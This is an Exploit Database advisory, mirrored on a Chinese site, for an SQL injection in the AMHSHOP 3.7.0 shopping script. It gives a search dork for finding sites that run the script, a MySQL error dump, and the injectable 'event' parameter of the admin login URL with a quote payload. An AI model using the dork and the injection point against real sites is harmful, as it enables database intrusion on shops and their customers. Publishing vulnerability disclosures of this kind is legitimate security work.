AMHSHOP 3.7.0 – SQL Injection

• Exploit Database
• 35 阅读

• 作者： Yassin Aboukir
  日期： 2011-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17402/

• ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Title: AMHSHOP 3.7.0 SQL Injection
  [+] Name : AMHSHOP 3.7.0
  [+] Affected Version : v3.7.0
  [+] Description: it's an arabic Shopping Script [Payable]
  [+] Software : http://amhserver.com/37/ & http://www.metjar.com/
  [+] Tested on: (L):Vista & Windows Xp and Windows 7
  [+] Dork : Powered by AMHSHOP 3.7.0
  [+] Date : 14/06/2011
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Author : Yassin Aboukir
  [+] Contact: 01Xp01@Gmail.com
  [+] Site : http://www.yaboukir.com
  [+] Greetz : Th3 uNkn0wnS Team ! & All My friends 
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  [+] Error:
  MySQL
  
   * Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''users_login_forgotpassword'' AND user_id = '' LIMIT 1' at line 1
   * Error Number:1064
   * SQL: SELECT restricted FROM userspermission WHERE page = 'users_login_forgotpassword'' AND user_id = '' LIMIT 1 
  
  
  
  # we had contacted the owner before and some websites have fixed the bug ;)
  
  [-] Exploit:-
  
  # http://[localhost]/Path/admin/index.php?module=users&page=login&event=[SQL]
  # http://[localhost]/Path/admin/index.php?module=users&page=login&event=forgotpassword'
  
  
  G00D LUCK ALL :)